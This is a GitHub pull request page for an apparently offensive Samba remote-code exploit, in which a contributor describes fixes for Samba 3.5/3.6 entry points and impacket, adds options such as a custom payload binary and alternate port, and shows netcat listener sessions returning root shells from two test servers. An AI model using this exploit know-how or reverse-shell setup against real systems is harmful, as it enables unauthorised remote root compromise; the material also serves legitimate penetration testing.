This repository has been archived by the owner on Apr 19, 2022. It is now read-only.

Some update #4

Merged
merged 6 commits into from Nov 27, 2017

Conversation

@archivaldo archivaldo commented Nov 26, 2017

Hello!
I was trying to test your exploit, but I have found some problems.

The first one was related to impacket and the way the library handles slashes.
You can read more about this in this issue.
https://github.com/CoreSecurity/impacket/issues/308
Having in mind that you have a local version of impacket, I just # the line generating the problem and everything is working fine.

The second problem was:
https://marc.info/?l=samba-technical&m=132534986404085
In this commit from 2011 the Samba team changed the entry point from init_samba_module to samba_init_module, so your exploit doesn't work on Samba versions 3.5.* and 3.6.*.
The fix was also simple.

samba 3.5.10 / lx x86

```
root@WorkStation:/# nc -l -p 1337
whoami; uname -a; /usr/sbin/smbd -V
root
Linux localhost 2.6.32-696.16.1.el6.i686 #1 SMP Wed Nov 15 16:16:47 UTC 2017 i686 i686 i386 GNU/Linux
Version 3.5.10
```

samba 4.5.9 / lx x64

```
root@WorkStation:/opt/bp0/smbmap# nc -l -p 1337
uname -a; whoami; /sbin/smbd -V
Linux localhost.localdomain 3.6.11-7.fc16.x86_64 #1 SMP Fri Feb 8 19:33:57 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
root
Version 4.5.9
```

I also made some changes to the arguments (and added new ones) to make it more user friendly.

`--no-compile`
This option disables the compilation of implant.c. The reason for this one was: if you are attacking a Samba server from an x86 machine, the compilation script is going to create two x86 binaries, overwriting the current binaries. Using this option, you can compile your x64 binary on another machine and use your x86 machine to run the attack.

`--port`
Samba could have port 445 closed and you need to target port 139.

`--old-version`
Use the old entry point for the Samba .so. If this option is not used, the script will use the new entry point.

`--custom-binary`
Sometimes you need to use your own custom binary to be loaded on the server.

that's all, have a nice day. :)

@joxeankoret joxeankoret merged commit 32f7e33 into joxeankoret:master Nov 27, 2017
@joxeankoret (Owner) commented:

Thanks a lot for your PR! I love it.
